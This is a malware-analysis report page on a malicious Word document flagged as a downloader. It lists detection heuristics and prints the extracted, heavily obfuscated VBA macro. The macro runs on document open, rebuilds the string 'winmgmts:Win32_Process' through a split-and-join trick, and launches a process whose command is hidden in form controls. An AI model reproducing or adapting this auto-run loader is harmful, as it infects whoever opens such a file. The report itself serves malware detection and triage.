MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-7469466-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7469466-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Nxlvynsymqluh = GetObject(Omarpfde) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12783 bytes |
SHA-256: 6403b5a288dab7046b4ca0b3dd7e349b76dfed983adc780dcc88884b3f1a3f74 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
403 of 608 identifiers look randomly generated (e.g. 'hnkjKHK2222NNKLSess_') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Xpkurgif"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Khytkvtzre, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Nnhdbrror As Boolean
Dim Wsczyedinudly As Double
Hrefgwynxhaep = Bdbekiiwgi
Gnjbimekzjlkb = (Erxandetz)
Goyvywzaranf = 997
Dim Lujrsqcmcdfi As Boolean
Sbtkrofqldlp = "Maxime."
Dim Gfrlficj As Boolean
Dim Hsrulvqp As Boolean
Dim Hqgdoenuj As Integer
Cfbgxmtdz = (561)
Dim Grcywkepnw As Boolean
Dim Tqynxbvha As Double
Enqonjwlooykp = Hcqtrjczhpz
Dim Cekiquxlgwrfr As Integer
Dim Rufjmhtsrg As String
Dim Coiyolzikd As Double
Udebfynayrhm = (Lojltcsivwx)
Urcboemo = ("Neque rerum.")
Snssxnlh = (Yzlzyknbmih)
Dim Wtiwpsixb As Boolean
Ryajvukobk = Gccdrlbawogv
Smadadpylqi
Dim Chuggarpi As String
Dim Qtprgutjyiqb As Boolean
Ydsxhuznccnfi = Wmdwaiqglavg
Ymgdhhxysbiv = (Meblqrcvmepq)
Hwloxvdqhbbuv = 576
Dim Cnefythzkplp As Boolean
Bnqaarvq = "Omnis excepturi voluptatem voluptatem aspernatur est."
Dim Howxzkvwfajqk As String
Dim Czxbymfzpg As Boolean
Dim Uufzmtgykw As Boolean
Auokcqkdgqyrx = (145)
Dim Mbpgrmzabzbxx As Integer
Dim Yfpyadxuwz As Boolean
Edwobwxtwv = Matnlbsmytss
Dim Osphshvcvwflz As Boolean
Dim Lqdpwlzk As String
Dim Vgilkldlci As String
Ocixkfwh = (Smndocfn)
Fyxamqklb = ("Suscipit earum maxime aut.")
Suhbahybuncis = (Yhwbfptxyqfil)
Dim Lfbfzsgcovhl As Boolean
Cqelqsdoatgy = Luznizcxgn
End Sub
Attribute VB_Name = "Rihhrozcvbo"
Attribute VB_Base = "0{67C962F7-255C-4A54-B746-5B48B0549899}{5BCEBDD0-328C-4442-8952-9E678F836C50}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Shqcibig"
Function Gykjilth()
Dim Qeviyzyuj As String
Dim Jpqpoyydzky As Double
Bdukvcnrrdmg = Qjnybvvzy
Rszbfwrkbgu = (Ygbxrmdjdrh)
Mxyycetwdj = 725
Dim Lgvvjawezzu As String
Hmxfoarhsktmd = "Aperiam dolorem veniam."
Dim Lqvxnhgfhnt As Boolean
Dim Pmmdfauswr As Boolean
Dim Whswbjgwh As Integer
Dwfqbgpsuj = (734)
Dim Gxqhcjwpzgor As String
Dim Jgdnudvdigz As Double
Mgzuyppmylbd = Djxhnqoxjo
Dim Cwcokhtrkja As Double
Dim Bkbkubkitsu As Boolean
Dim Lsepwknjmsjka As Boolean
Vaujkslgnm = (Wgjeiclvan)
Pzfpsrzuhz = ("Josh")
Xlagzmrchxqd = (Bhpykifitlm)
Dim Vmufxuphxcf As Boolean
Wsericleqse = Eoproudzvpm
Usevejolgkbmf = Xpkurgif.Khytkvtzre
Dim Ebklouvx As String
Dim Sanyvdfvm As Boolean
Uumgirzil = Paiodzfn
Hrhgccdxspvt = (Gyefcwoxgr)
Qhagqybpmd = 157
Dim Govlskev As String
Hevzkddkkpupm = "In voluptatem minus."
Dim Lyxsexcsdznad As String
Dim Mpgsavlqnymcs As Boolean
Dim Qczoglhdc As Boolean
Msaxcafpd = (396)
Dim Tvaaijtsuk As Double
Dim Jkaoykfmdrujt As Boolean
Vmxdmagjdng = Jjfvjurmblhey
Dim Cbrhrsxfx As Integer
Dim Wcbwasghcum As String
Dim Yzetaqyohahcw As Boolean
Fmdiotyoke = (Yrrlpbrjrod)
Hbpbuuetu = ("Dolores")
Qdkgaluoqba = (Prbepuqiybg)
Dim Mpkfvdobvm As Double
Jgtppfhezm = Aezlhrcdprye
Mkcmnsggedoe = Usevejolgkbmf + Rihhrozcvbo.Ewydckuorvxx + Rihhrozcvbo.Dvophcgtsfed + Rihhrozcvbo.Yasxyxdwcied
Dim Skkwyalsqq As Double
Dim Mhjfhgcm As Boolean
Jqeefvzppt = Gdvkjejwaie
Rjniytptgburu = (Tbajiyafkwx)
Tlaltinl = 81
Dim Rzfuzcato As Integer
Dziudxrddlav = "Perferendis qui."
Dim Vaiymheh As Boolean
Dim Kcebdjdiok As Integer
Dim Srqkwiivqe As String
Ecruccovfzka = (913)
Dim Atisgbkjhri As Boolean
Dim Wyxrfjlxar As Integer
Mvugtgpsg = Nyxriuuamaq
Dim Hheqhszbzlufq As Boolean
Dim Ksjfojkshsc As Double
Dim Rwgvdxylc As String
Nhnnnclrrg = (Qldnxoxyfqtk)
Zbtecitzs = ("Qui quos.")
Wffgklzbcpjaj = (Fafwocjhdkymd)
Dim Rtwqaiss As Boolean
Tjbqpbjdf = Tvstnxbvmywt
Wbwwufouw = Mkcmnsggedoe + Rihhrozcvbo.Iiunyznb + Rihhrozcvbo.Zwwhxbbjtysnu.Tag
Dim Tfwjecjksyb As Boolean
Dim Gyusotyhtbxu As Boolean
Bzktbxlytzcyt = Rycfgjndmru
Zeypxehli = (Hhheuppawqcdv)
Powxbgye = 938
Dim Bmboufjtcxz As Double
Iwctcqxad = "Veniam."
Dim Psokdticiptco As Double
Dim Ksjtrang As Integer
Dim Znwnaoxn As String
Crypjpwstptoi = (893)
Dim Fqjiwcmak As Integer
Dim Mpiavpjmz As String
Ukbdumyglevg = Neiwprolddhkt
Dim Evbnmwzg As String
Dim Zbesbqinc As String
Dim Apjbfigywk As String
Cgittiaox = (Ppjsbmyxqls)
Slhoshvxg = ("Voluptatem aut occaecati.")
Msxpebtn = (Tlvpfmymctjcc)
Dim Bmvqusjuh As Double
Pitpsftgyz = Nvxkdcsjqwhdp
Gykjilth = Bvupupavcuz + Wbwwufouw + Bvupupavcuz
Dim Dfkakixdpvtmb As Boolean
Dim Vyfauebhdhmj As String
Deobpequvdr = Zawepwhzatah
Xhtyyymm = (Lmpbbccia)
Hhcxmrrc = 525
Dim Tvctnbfswhn As Integer
Sdggxxrshjz = "Catherine"
Dim Qblhvjfrsrnio As Boolean
Dim Pedoxqktgkteu As Double
Dim Ldcnldhold As Boolean
Altyjxtcdgkti = (638)
Dim Fwcfkwhfj As String
Dim Ptiprlsr As Integer
Nmjhashfs = Ewbsjytct
Dim Sjhatoozar As Double
Dim Sksxkdzzqwvlw As Boolean
Dim Hnyoqbduaazyt As Integer
Iohxjirajztg = (Ovemrglccgxo)
Xlefjwohezxp = ("Ipsa.")
Ppwukymevm = (Iglbzusadx)
Dim Xvggrepcqym As Boolean
Ddrespsdzo = Dzcwqjrviwosf
End Function
Function Smadadpylqi()
Dim Fefnkjmlp As Boolean
Dim Nktytanrfgjg As String
Klnenhphuw = Vvxfquwi
Pgvllkcbvxi = (Yzhckffp)
Tfruaqpko = 133
Dim Vhicveftausq As String
Gjrldjasacgtp = "Et voluptatem."
Dim Gmtjfcsyao As String
Dim Wwlbowvt As Boolean
Dim Yllucggwcodiu As Boolean
Hpwokrxdidwpa = (82)
Dim Uieiniylalsdm As Integer
Dim Obddhgyfwgbic As Double
Rfeftudmt = Ewcsnlrlpu
Dim Kqwchbmavutun As Double
Dim Rckpjnybc As Double
Dim Sqqqbmfh As Double
Xrwkhpmkdif = (Zjeebkmp)
Diwjfshpfftuk = ("Quod quia molestiae.")
Cxlqzuzel = (Whdwhydss)
Dim Fhrvszilfy As Integer
Znayueeeksxwz = Xuqswdrrdz
iwoowjjjjj = "_&&*8992307&)hnkjKHK2222NNKLS"
Dim Lprrcwjh As String
Dim Zjmbemmguoux As Boolean
Vywcvusoobbxd = Dicqurzif
Dmbtgoysve = (Lzdlukzhi)
Qgrhwhwprciqf = 13
Dim Vnyladdbqqrg As Double
Ftennknogckzo = "Odit optio id."
Dim Cjxyapmix As Boolean
Dim Nfareasrljecs As String
Dim Ggwaaovwn As Double
Idjtkgxqxinp = (705)
Dim Gwwuygfvti As Integer
Dim Xohrimjlso As Integer
Yyebfysryqur = Paomkaoz
Dim Jfabfmrsoe As Double
Dim Bdpvqnngupsgw As String
Dim Fehezpvszxrlm As Integer
Cufqykwo = (Lcotmtew)
Nhawkglqxz = ("Beatae perspiciatis voluptas neque.")
Htmyagkm = (Xdnmhynempx)
Dim Vujgszgqlyl As Boolean
Hotylccxkwix = Ctmmduereq
Mctupaxleempp = Split("_&&*8992307&)hnkjKHK2222NNKLSwi_&&*8992307&)hnkjKHK2222NNKLSnm_&&*8992307&)hnkjKHK2222NNKLSgmt_&&*8992307&)hnkjKH" + "K2222NNKLSs:W_&&*8992307&)hnkjKHK2222NNKLSin_&&*8992307&)hnkjKHK2222NNKLS32_" + Xpkurgif.Khytkvtzre + "_&&*8992307&)hnkjKHK2222NNKLSroc_&&*8992307&)hnkjKHK2222NNKLSess_&&*8992307&)hnkjKHK2222NNKLS", iwoowjjjjj)
Dim Dxrcjcmf As Integer
Dim Dulxlppuoag As Integer
Autzvqrjx = Pxztrnvlqo
Ajjmrwlmvgrqh = (Rpdgffah)
Vcbfuhruwsp = 867
Dim Zmmdpifi As String
Kevmhata = "Aut vero ut."
Dim Wvukhazawlxnf As Boolean
Dim Ttblyihj As String
Dim Ayujtcsnphd As String
Vojfmbew = (299)
Dim Inhrpdnpms As String
Dim Ceqciezpe As Integer
Rfwpdvhx = Olwmldkc
Dim Zhpmeojtzwje As Double
Dim Plsoktevze As Double
Dim Upwbpnmibkqj As Double
Loxxrjcjxzk = (Yneikzlutwy)
Rakfvidwipxcm = ("Qui ut earum fuga ducimus repellat nemo.")
Ksxqtwovxcf = (Urszqvrcysebs)
Dim Xgfxvvjbzhn As Boolean
Fndpyecq = Mrlolaspbbyyq
Omarpfde = Join(Mctupaxleempp, "")
Dim Xqdgyqgiodg As Boolean
Dim Elserynb As Boolean
Vrahzefs = Hpyjusgcizf
Jwnbysnaokn = (Xjhdjkrnvpn)
Ysktmxvbrl = 862
Dim Gacqtekc As String
Xvequjbngzso = "Voluptatem."
Dim Pvxqlmfxvbck As String
Dim Ckdgdduoowclz As String
Dim Mjsghbygt As Double
Pzadnkuflvvl = (593)
Dim Aagaozmbtjr As Integer
Dim Hvdekqkn As Integer
Ljsrutiqxhq = Sffqgofq
Dim Gmjhrlva As Double
Dim Mvrvisiks As Integer
Dim Navlyfad As Double
Xzflfllqecg = (Owojiogv)
Atlowtguxdpo = ("In.")
Jchwtnqvay = (Jvspstzhesu)
Dim Xyijjmzbcaf As Double
Bjbftmghjl = Lvoohqijh
Set Nxlvynsymqluh = GetObject(Omarpfde)
Dim Bwnndnsvdcw As Integer
Dim Ikddspezpuq As String
Attclxfnivjiy = Uhfqdwymenvv
Mcwkgnycbqz = (Zptuurle)
Zzachooqbmw = 74
Dim Myrlusforpty As Double
Tbegmemxkg = "Molestias perferendis."
Dim Nmaxafdwhwc As Boolean
Dim Lbahjgdkduox As Double
Dim Rgonlaceso As Integer
Nvadxyyoacl = (936)
Dim Zggkslau As String
Dim Qsiqfohjmn As Double
Ikaxpzrkouym = Wuacuvsjjloh
Dim Ttzdggyv As String
Dim Vbckxwtvemsm As Double
Dim Szzzbpihgr As Integer
Vvgfvakggssh = (Rsdghglokhh)
Uloultcaxpzq = ("Facere eum eaque tenetur aliquam quo.")
Cdagsonx = (Ajkjglzyw)
Dim Usyhoimtddp As Boolean
Jkjaokhxw = Bjtumqbumlhl
Zrzqzhzrrhbi = Omarpfde + Rihhrozcvbo.Qngqytra.ControlTipText + Rihhrozcvbo.Wbnlesyzfb.ControlTipText
Dim Zutxvimoaswkk As String
Dim Xwkhsrtwbqw As Integer
Wtubctzw = Erdbkfajknsuc
Cggyrgyolshy = (Rlshxgppq)
Bhlhicqqgam = 729
Dim Ytfdrjdgfbtba As String
Xemqyhpym = "Dolorum."
Dim Pqhohesu As Integer
Dim Alxgekwf As String
Dim Ioktbnwuq As String
Swptnzqupife = (139)
Dim Tojtxtsubtbfo As String
Dim Ixeajipinrkf As Double
Xdkiwiym = Pbyvvshkebgl
Dim Sodgvcmn As String
Dim Dqqxsduvwllh As Boolean
Dim Nvkzbjwmcgpi As Boolean
Qygbtgrebjsa = (Ootlejsasm)
Vrokhjybfxfjn = ("Quas dicta sapiente earum et sit.")
Juahbclx = (Ddvapgtqvkz)
Dim Cicffqjjyah As Double
Rfkvkuaxd = Bprltrtc
Aaxlecvxu = Zrzqzhzrrhbi + Xpkurgif.Khytkvtzre
Dim Mgmsumnfphq As String
Dim Edizhqtr As Boolean
Jmaumyfjg = Kdooaufvgj
Zvimkqjjxoz = (Trbgjyjyq)
Tlgvovswgwbyd = 999
Dim Twamveligdeo As Boolean
Tribjszjnv = "Felix"
Dim Cxjstyupfmyey As Boolean
Dim Czsjhvlme As String
Dim Utvjjekzbozok As Boolean
Gggtecnkwjul = (344)
Dim Rkfzwdbu As Integer
Dim Ttzuudli As Integer
Offkotgjyao = Yjduoncsmkd
Dim Dtptxmhgmm As Double
Dim Lcwsvupzdakq As Boolean
Dim Uavcuckeqntfc As Double
Jmxyzdlfzq = (Zhciyjarglj)
Jgljyqrn = ("A voluptas placeat magni.")
Onsjtjvvleol = (Evvckexcfwp)
Dim Wbaxalnnvgagi As Boolean
Ynnyjxfdvpd = Lhvtxjztlgnzk
Set Smadadpylqi = GetObject(Aaxlecvxu)
Dim Bhjkcgzb As Double
Dim Gyidqeekwd As String
Zjtjrdwflo = Jjbyphdt
Ixdxdtutbnqq = (Qtowefysngugc)
Pztleawftzcl = 221
Dim Xltcchwtho As Double
Pkxdxqoxmnxfc = "Vitae quidem commodi."
Dim Nuwcuffpuaea As String
Dim Vseqhllhpclwu As String
Dim Onzdniylma As Integer
Udcsqqzqvs = (159)
Dim Nifetqxkgfgn As Double
Dim Kqxgrqqbrenkv As String
Iovzdpfdtrwdg = Wpmsgitpbye
Dim Arjuqpxrkob As Double
Dim Mepunkxch As String
Dim Dampzuazcocbi As Integer
Rgwmbkkawo = (Lupotulrq)
Sqncfrkcg = ("Quia et ut.")
Trgvwmtz = (Znpenzjh)
Dim Voydvoiejl As Integer
Nkbxixyyyrlg = Yxrravkh
Smadadpylqi.XSize = False
Dim Exlcwdopyaien As String
Dim Isnqnzshrze As Boolean
Sudpdxtaixjh = Ueuxjgggecufw
Udsctxdwtap = (Audjpaycxbu)
Lpauybikour = 721
Dim Cqhawuhq As Boolean
Zlpwnmwcxi = "Nihil et aliquam."
Dim Nwzcorfmam As String
Dim Yhvxeamxff As Double
Dim Ifvxrsuvzq As Integer
Aufqktkmfd = (343)
Dim Rzxwvhgiv As String
Dim Iviuhrjmhekw As String
Wnlvodehpfsu = Rjupkawubycvv
Dim Ahdnczuungn As Double
Dim Gdcnukux As Integer
Dim Ljxblmsthnro As String
Hvzxphjxlvo = (Palwsqnrdeyjh)
Gbkrfofzkxi = ("Aliquam.")
Oxcnmqdsvq = (Kwdrbnhmvrjlw)
Dim Jbbzjncdg As Boolean
Wqrukllsur = Jjbqpxorq
Smadadpylqi.YSize = False
Dim Wycxobshkpjfp As String
Dim Tojaoxgbvrb As String
Rfymxcfhlzz = Obsoralmcz
Mcpwgfnp = (Frxinmihpjw)
Ejhaabcof = 191
Dim Kzqlfumohy As Integer
Qinydvja = "Commodi perspiciatis accusamus itaque."
Dim Uknzemnbbz As String
Dim Xnwxcvxhvj As String
Dim Qrncysvng As Integer
Fxgpzagwv = (395)
Dim Kzcgtodx As String
Dim Bginzldjep As Double
Irzwfxgpnnimg = Rzgjjmvd
Dim Capdnrjynrlhw As String
Dim Qzxoxvgll As String
Dim Xfwknnhydx As String
Zvyosxokcx = (Mxptcwpdreue)
Dxzyghzn = ("Ignacio")
Zhnowagzbdyp = (Wginuvbtlpt)
Dim Erwtyzxuui As Boolean
Rxudyeoam = Zltcrfvxufpci
Do While Nxlvynsymqluh.Create(KSNNSN & Gykjilth, Dslfpjqnbuf, Smadadpylqi, Umeqbrcvl)
Loop
Dim Coquzqyrn As Boolean
Dim Vqlleenwoqape As Boolean
Jhixkwacafcaf = Jrreycntcmt
Obymcdgr = (Zzvnkgcdhjz)
Yzstvnfkrp = 780
Dim Zgpycgwbbrf As Integer
Cmajlxchsan = "Eaque rerum officiis."
Dim Lddfhjxylz As Integer
Dim Ecdfhgupe As String
Dim Fbfsvhgg As Double
Tusxwjvgqrn = (322)
Dim Huzbltsu As Boolean
Dim Cxdcrbrftjqk As Boolean
Ikwzjobnrx = Wfumkupcqzshd
Dim Ltdnwmotbwtlp As Boolean
Dim Ggdtflkgzwv As Double
Dim Irpveqpunkck As Double
Tqqjalbtmd = (Mbneqahukjhyg)
Uswbjyyq = ("Voluptatum corporis labore.")
Nvttoellgd = (Jtbdmbjis)
Dim Lgbqcazn As String
Udfnbwfwmavmo = Afmxhhrk
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.